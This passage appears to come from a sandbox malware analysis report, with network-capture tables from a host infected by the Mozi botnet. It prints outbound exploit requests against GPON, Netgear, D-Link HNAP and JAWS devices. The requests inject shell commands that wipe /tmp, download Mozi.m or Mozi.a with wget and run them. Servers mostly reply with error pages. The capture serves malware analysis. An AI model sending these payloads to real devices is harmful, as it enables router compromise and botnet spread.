                                                                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                                                                                                                        Apr 25, 2021 21:00:49.466766119 CEST692INHTTP/1.1 302 Moved Temporarily
                                                                                                                        Content-Type: text/html
                                                                                                                        Date: Sun, 25 Apr 2021 19:00:49 GMT
                                                                                                                        Location: http://panel.counter1.fc2.com
                                                                                                                        Server: nginx/1.5.7
                                                                                                                        Content-Length: 164
                                                                                                                        Connection: keep-alive
                                                                                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 70 61 6e 65 6c 2e 63 6f 75 6e 74 65 72 31 2e 66 63 32 2e 63 6f 6d 22 3e 68 74 74 70 3a 2f 2f 70 61 6e 65 6c 2e 63 6f 75 6e 74 65 72 31 2e 66 63 32 2e 63 6f 6d 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 48 54 4d 4c 3e 0a
                                                                                                                        Data Ascii: <HTML><head><title>Redirect</title></head><body><div align="center"><a href="http://panel.counter1.fc2.com">http://panel.counter1.fc2.com</a></div></body></HTML>
                                                                                                                        Apr 25, 2021 21:00:49.707951069 CEST693INHTTP/1.1 503 Service Unavailable.
                                                                                                                        Content-length:0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        25192.168.2.2032916106.2.23.2180
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Apr 25, 2021 21:00:49.587275982 CEST693OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                                        Apr 25, 2021 21:00:50.766669035 CEST701OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                                        Apr 25, 2021 21:00:52.526381016 CEST710OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                                        Apr 25, 2021 21:00:56.041613102 CEST724OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                                        Apr 25, 2021 21:01:03.080224037 CEST756OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                                        Apr 25, 2021 21:01:17.157325983 CEST824OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                                        Apr 25, 2021 21:01:45.311527014 CEST957OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        26192.168.2.204162213.126.136.2780
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Apr 25, 2021 21:00:54.229784966 CEST714OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        27192.168.2.2051938157.245.223.13180
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Apr 25, 2021 21:00:56.160922050 CEST725OUTPOST /HNAP1/ HTTP/1.0
                                                                                                                        Host: 157.245.223.131:80
                                                                                                                        Content-Type: text/xml; charset="utf-8"
                                                                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                                        Content-Length: 640
                                                                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                                                                                                                        Apr 25, 2021 21:01:07.019231081 CEST780INHTTP/1.1 400 Bad Request
                                                                                                                        Date: Sun, 25 Apr 2021 19:00:56 GMT
                                                                                                                        Server: Apache/2.4.29 (Ubuntu)
                                                                                                                        Content-Length: 307
                                                                                                                        Connection: close
                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 37 2e 32 34 35 2e 32 32 33 2e 31 33 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.29 (Ubuntu) Server at 157.245.223.131 Port 80</address></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        28192.168.2.204049023.76.236.9380
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Apr 25, 2021 21:01:03.355983019 CEST757OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                                        User-Agent: Hello, world
                                                                                                                        Host: 23.76.236.93:80
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                                        Connection: keep-alive
                                                                                                                        Apr 25, 2021 21:01:03.669007063 CEST757INHTTP/1.0 400 Bad Request
                                                                                                                        Server: AkamaiGHost
                                                                                                                        Mime-Version: 1.0
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 209
                                                                                                                        Expires: Sun, 25 Apr 2021 19:01:03 GMT
                                                                                                                        Date: Sun, 25 Apr 2021 19:01:03 GMT
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 64 32 65 33 37 31 37 26 23 34 36 3b 31 36 31 39 33 37 37 32 36 33 26 23 34 36 3b 32 39 37 39 34 33 62 30 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                                                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;2d2e3717&#46;1619377263&#46;297943b0</BODY></HTML>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        29192.168.2.206099881.7.8.1280
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Apr 25, 2021 21:01:19.135195971 CEST833OUTPOST /HNAP1/ HTTP/1.0
                                                                                                                        Host: 81.7.8.12:80
                                                                                                                        Content-Type: text/xml; charset="utf-8"
                                                                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                                        Content-Length: 640
                                                                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                                                                                                                        Apr 25, 2021 21:01:29.953634977 CEST882INHTTP/1.1 301 Moved Permanently
                                                                                                                        Date: Sun, 25 Apr 2021 19:01:19 GMT
                                                                                                                        Server: Apache/2.4.18 (Ubuntu)
                                                                                                                        Location: https://vm3.kortenbrede.de/HNAP1/
                                                                                                                        Content-Length: 316
                                                                                                                        Connection: close
                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 76 6d 33 2e 6b 6f 72 74 65 6e 62 72 65 64 65 2e 64 65 2f 48 4e 41 50 31 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 38 31 2e 37 2e 38 2e 31 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://vm3.kortenbrede.de/HNAP1/">here</a>.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at 81.7.8.12 Port 80</address></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        3192.168.2.2052888109.67.247.12580
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Apr 25, 2021 20:59:18.130829096 CEST202OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                                        Apr 25, 2021 20:59:18.245238066 CEST203INHTTP/1.0 403 Forbidden


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        30192.168.2.2039386178.79.174.15880
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Apr 25, 2021 21:01:45.054279089 CEST956OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                                        Host: 127.0.0.1:80
                                                                                                                        Connection: keep-alive
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept: */*
                                                                                                                        User-Agent: Hello, World
                                                                                                                        Content-Length: 118
                                                                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                                                                                                                        Apr 25, 2021 21:01:50.112118959 CEST978INHTTP/1.1 404 Not Found
                                                                                                                        Date: Sun, 25 Apr 2021 19:01:45 GMT
                                                                                                                        Server: Apache
                                                                                                                        Content-Length: 216
                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 47 70 6f 6e 46 6f 72 6d 2f 64 69 61 67 5f 46 6f 72 6d 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /GponForm/diag_Form was not found on this server.</p></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        31192.168.2.203913879.171.18.10680
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Apr 25, 2021 21:01:59.083142996 CEST1023OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                                        User-Agent: Hello, world
                                                                                                                        Host: 79.171.18.106:80
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                                        Connection: keep-alive
                                                                                                                        Apr 25, 2021 21:01:59.161808968 CEST1025INHTTP/1.1 404 Not Found
                                                                                                                        Content-Type: text/html
                                                                                                                        Server: Microsoft-IIS/8.5
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        Date: Sun, 25 Apr 2021 19:01:58 GMT
                                                                                                                        Content-Length: 1245
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69
